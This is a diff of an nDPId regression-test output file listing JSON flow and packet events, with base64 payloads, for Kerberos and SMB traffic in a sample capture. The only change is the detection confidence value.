00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337929790,"pkt":"AAgCHEeupB9ywglqCABFAAE+ExRAAIAGfbSsEAgIrBAIyQBYwAVvOdOesp21NlAYAQCkkQAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDBjUgpgMCARmpEBsOaGFwcHljcmFmdC5vcmeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00729{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1549337929811,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337929811,"pkt":"pB9ywglqAAgCHEeuCABFAAFnABtAAIAGkISsEAjJrBAICMAGAFganBtaQ2U1slAYAQDaGgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4YERcga5zFfjuo7+oqo0hJ6Udj7efOwOKKYJj6PKpxuETgzDcdt27IvGW9sEQ18QPUV\/drVuLVBwwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOaGFwcHljcmFmdC5vcmejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETsAWF6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} 
-00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1549337929812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337929812,"pkt":"AAgCHEeupB9ywglqCABFAACYExlAAIAGflWsEAgIrBAIyQBYwAZDZTtmGpwcmVAYAQDnsgAAX5hri3Z\/opje40K53kwDKo2\/CTegm0pJkWpLVNFlnn\/MakUFXqKHv4CDtH2CbQqvJq\/ecJgxH2EwrzVmUcQk2zqXXjIwbkyszZ9\/Xc6IEgQ4qiI64lPzINS7ueVTbdUXk\/8v52QxoGdMilBjjWTAcQ=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337929815,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337929815,"pkt":"pB9ywglqAAgCHEeuCABFAACxACFAAIAGkTSsEAjJrBAICMAHAFgBsoC8gS4auFAYAQDUqQAAiNeE+tCJIo9Cz1KFHGicigIlxkFIEVkb70vifDKvvi6NwB24GlkehWdocuUvESpeAqtSofWtuKDm2yskVOheE+r4DxaQxRLncJy9zYBP+p7ofQvBukmarkg+oY3ctA8jgj5BSy2yi42NlxJjhcjuX3ByLG+GD20zq41Le0TbPh0TFS5qkRb0Q24="} 
00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1549337929815,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337929815,"pkt":"AAgCHEeupB9ywglqCABFAACbEx9AAIAGfkysEAgIrBAIyQBYwAeBLiBsAbKBRVAYAQBP\/wAA1H56bb56rLTzhI\/so6pGl6jILu03bHY2ZWl4A41JY07Kavo1sQRKhlNPx3vE\/LdSF6BX6NLW1Fm3Tdmvr7ZEbPWOq8FZs9c0RBY7wJbwPUW44FlC0vhqJn1yGB3K1Fxl0gPqAAMzMrhupJQMQzjV4fgdag=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337929816,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/ACZAAIAGjCGsEAjJrBAICMAIAFgkzleN\/pyBM1AYAQCd1QAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1l4LwpNuTjPo\/WSca61wgawIInNQ2vTGqwCxtV1QigPfApKXxUIq16oPsvd5TUFFBoZ3psSaal0IeVBLFx\/BX1XOMXvlpVRB9MsTpZwTQ9ax1GLB6I2i5bbUZpknsnBAKrSXL695P06nXI2pxBPckcoFwJAlSBEmG2XByE8IS7rO1EarXMbJ6Y6aTY3qAJfaaRab4vHhRG2Vuf+5JWuR5w1NLPXeeoD\/rArSk0gCVLkR21SKfZcS\/vqPldqO0np7TLmMBVoYjsl6PiI0+4z2cMBft\/qbxRIxb8y1vWhjoJ64ue7lCoT2cvFOdVWD\/WH\/fANzw0ML9F0vLIXCgI1qi1sWcerxATeYpOyo7DWpsJioH9jxAPx+B6RM+9U5zQIKM9BdT3C3olrkQMfOua6FPtyqIt9kVcakdowBTS4+NidzK5sGlYIRntlAxGR8YU5brzwGdboEMfsAHK11qtTE6t\/tDmgr1+cFgW34p7q9yjtfw3IlMfNtNF6cVYmOh6G5Wnxcfjqbsrpj7Kw6mjBwfKtaYNJG6XthlVKo9I4FpdysFIteChs2N+mQtafp0AWZxKjjDKO8sohbJklYhyoJOto52hds26FAU4LmrIc5fMmADp1PG\/tBDi0BnZ3SimtoeWyM2fnwWhBrH67Gc6TeKPHSeyVFwR1fSnMxZTlzS7KXwLa62U6BZ0WNCBZzIdUTje6\/aUFTq4XeeR0Z7Vh6Z9DZ9om\/9wiQsBPMMalPRPnqfmOZT7HV5yr74UqmbVg1OWh8En3RVYoEzl+U9UxwXXFIR5zUwJrSv4BRCrfouK2f87lMtCFEg\/zEl+Ya6jB+A9XZfPbLOpJ+x1ZsBKiE7MFw9X4cPsiIvoIaHcwmirVOaa9JrhuL72qg0GrV2LWFm+xJt5NjWGhgRHFok1jp2URmHs7J3zvdeb+nbPHLvYUdtkqwb3aoYEr1Xmflw8UpDr6MDbT2en\/\/11z39903bvFGohUv62WN4swCRiY9JjXJUs610D4Xxus5+CL0zgzTQQAxEvC4LL9CQELhrXgdhbQmsotNytXnsgYuKhF4RMS5q5UH8sx1AGsmSntAJ\/W4iO+\/MbV3oU5HdPpcERFm3hfRy\/GBSS75vadxxOcRHZA6iF9\/pQ9BlFHhHcWkaQuZyUL6qH1sbSQyui0sXjtHojjpnPlsTpEM9hpMt6LhooASI6ATNe\/Xw7kB+HTJthDR\/bJnXbftcEdtnk7dLQYL5MfhSH8BDyuI9MMLmdpozP+V7mPT5HhUnsqRSQWCVyfiuDhL0shZpk83
f0xNTTmK8fhSYF8Q1BGkgZwwgZmgAwIBEqKBkQSBjpT6WKZ4R5UUi5WTtSgEkEd7jMLa6AoUPu4TwrcLKGcmB9vngXIzOhZvqCgHdzOkHetRjgLUyTIXem1PFxz6mY8TxQcIZDyb19SN3Nd3sKaxs2IYEv7YHwXG6E8LM8hJLH2m\/TyiwnWxB70uZ574gAkF4FD1Zq+qMVWQ8VxsOQkGL92ElZ2TaAS4GGYCEnUwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7NBe6oBTADAgES"} -00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} +00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337929816,"pkt":"AAgCHEeupB9ywglqCABFAAXMEyNAAIAGeResEAgIrBAIyQBYwAj+nIEzJM5dJFAYAQC28wAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9ZmgNa1dr3wGd87q5o3XWLsTIWysbTgkwJr+Tn54CyV4AH6vlEgusASRdJcyvN0onPWOO9TStPkihUEobLQ8WG5\/BAe\/pJm76NJeRjK9kGGi8G\/0XbFCYSPepa5PQwmUgAjsgxX98uOoIoeMgpxrDD2I4YnqT0o9T7E4u8XbTiIf+v3cdcN4dCZ+EoTKAM9GSdtpSP62\/Xb+2PxUXMWzXRKdBV4GPRc7M\/f3KRdK529+2pM4yLgF6mfdzw1YttOYiTQBSOIseZU5L5pWWwIAYUeadQLWeGW7MCmuOiezPfzHOKXT\/hMqEB\/2Egds2KA7Hm\/oP01r9IU6p42tCtn+I4EWSm5ZkiMAIXP6SCiOdO2PbdtR\/4GK9kZARZpgtLJG+aGmFpRzNAdcgcLMHN2OlX0J6+piruBM7Ww3kqLpZgruCuGx8K+d\/8FApmAeWnLmXbD3fu1T00fGd6fdKrkgCl98Sy4I0iKgJr019SubVPh\/tLfXvOPHFTskrZiab\/lkJMa\/lcaCHUWtHfBuxSsNJt7gody42oqvvYHikEn7VlQJDi\/u8KzU07HljjjoqhCYV678B3YcCsVdGefRzEoUzSdH\/BYJGW+CkosfzR7MiRBWyvn77tCF67oxZ3T5EhVst6OUOt05ejCBeF0j2P8Sa6RL1vPg6TCt7KX5yXzGdJtuRQYFzwHms4Ux+JYQXrmLh2ixoc55gWooUap7xcPOrj9EtgR7efu2PqGQVuytvq6rdV+3QUFA8AufxbPXK507+RBmLMcLcxZAxOp7SQc\/Ay3c\/ORhr+fWLV6VFfX75zufwBySCOGvrbuFXK0SnMVFwylor3lGY2Czl7Y5QKDcK4+FS+SJKTqaxj0EFxa2D+DbGLwbVt3zt9+tPhI+pr7vL0LtIL0O055Y3MLTTiVoB4FnEuGzQivRnPbXzFFcdCIUDcAh26XtB4LCpmd+fBTcLafa5ZKQ2nsR\/2LH7kpZxim50Hcvtyd5PzGPwKSVk2Q+psnZ0IehfsbwhALTs\/RQSOb7Rq41AGgy7OAH5YvpBKSd7qUDfb1gtLh6EIYhMprEuGvAg42lOnEYktaA8Y0X4PyM72xSTA9ZN+CxfcvwiIlvHf11TL5C5ZRBUy3du\/RJjPcfxsjqIdqVfXMDys4DGOvXOODvANQyMdpD2WSRWTBduQ+1useq7xNugt3rmAScfUohAT\/giN4TexFk96WUfGs376rRqExitzbuece0s6lptdaN+3sKDC1NFILlW4MQPBHpc3ComgefM9jAmeqLxMUur1iJW82d2i1F5BNiRpTZE
Ff7MD9poIBJjCCASKgAwIBEqKCARkEggEVQDvO7+WVQbXswJT\/WKenjoLOTOUb7xtnQSDSvTALA7cFBjKmG7py2Ll3YHsUrZQaKL2ZgS2bNcKYx\/3+lfvv+kAlvcN39ExBH9j9AGm8H1cRnFwNhRWCETnioXg\/P1Y2p+e3F0h6bOneEdLiePwHJv9FonrRV61HKyJDpzH6E0h5BR7t2eo\/60DJORIRuiguwoofBgNuIj9IIWatzAufVetcbqrWIpOgXa8Tl5itQ\/bI2zF6hwUS3TRThkmm+Lz7J7LBceoySEetzaEsRZtQYN6tENYmlD5+VEJvmJ\/Gk593lHeRAE07ZMXwY1fmEib\/vL\/sBgCUMH7CIYMAL4GjstMrJCbIeZhyoYmoahgOuedSq46aMw=="} -00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929817,"flow_last_seen":1549337929817,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337929817,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1549337929817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337929817,"pkt":"pB9ywglqAAgCHEeuCABFAAELACpAAIAGkNGsEAjJrBAICMAEAb1XsKRSOc8tT1AYAP5XOQAAtEaCpoUNMQEcRu8rXL+flRkpXPhHudnte7juaoAeTLu\/yTOr\/klMHDKYHSz0JIIsigIVsBaMl3PyJLoeb\/thjoYGSwkEC2m4nRdpRXAof0BuI3WnXPinh7MhPVCaTGyJNfqfVu\/1dc4+HXKYy76MWWV4zUtzQAeAZlVdIbuoLUlvFXjFSw5Ryb7lDA5ay5XLMnQY1U2bYUt6MYxBsLvHXZpUwBGPjxstpVTddlgnyYV1MOsJQv5Du0utIGTzTo6LpQrGUrUbi+j64I7Cmr+KeRuwdhEzhGbc+mJlwRYjD6cvIxA="} 
00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1549337929818,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337929818,"pkt":"AAgCHEeupB9ywglqCABFAAEsEydAAIAGfbOsEAgIrBAIyQG9wAQ5zy1PV7ClNVAYAQBD3AAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAIAAAAAAAAA\/\/4AAAAAAABZAAAAAAQAAM9KX1xrFqd60K9wkt\/rc1cJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbaDd4i7\/ItyR1a9jC52avEiTOhersM4IXB2s8eeK3O+ftonNzS3toSakh8sE2tBVm3gbqMBKq1zSZzBBR6cu+Hrjxp\/3xoJEFPVC\/4y\/BWmosce7zt2RHazTIcgt7F0qD+5oY0gWkTgMB+VU0Ro="} 
@@ -28,12 +27,11 @@ 00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAAD6EzZAAIAGfdasEAgIrBAIyQGFwAlIl8v7DkIzcVAYAQBePQAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1fPlG7bKWdrh2HD6cpz+MijBmfhDcDSHRgxosMnwcbCi1ZRnrViGBtMC2nQv6mVUDSJapX\/mZgtc4l9ALb+\/jokxskSCIt0GZfBXlBh6SOp7g9nc\/2WT4mG5e+fctttNW4KixsBWTLsk4U0TsD"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1549337930192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337930192,"pkt":"pB9ywglqAAgCHEeuCABFAAEXAE9AAIAGkKCsEAjJrBAICMAOAFh1zEKiBQpS4FAYAQB22wAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE6HHTSoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
+00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1549337930193,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337930193,"pkt":"AAgCHEeupB9ywglqCABFAAE+E0ZAAIAGfYKsEAgIrBAIyQBYwA4FClLgdcxDkVAYAQCvKAAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDDGWApgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} 
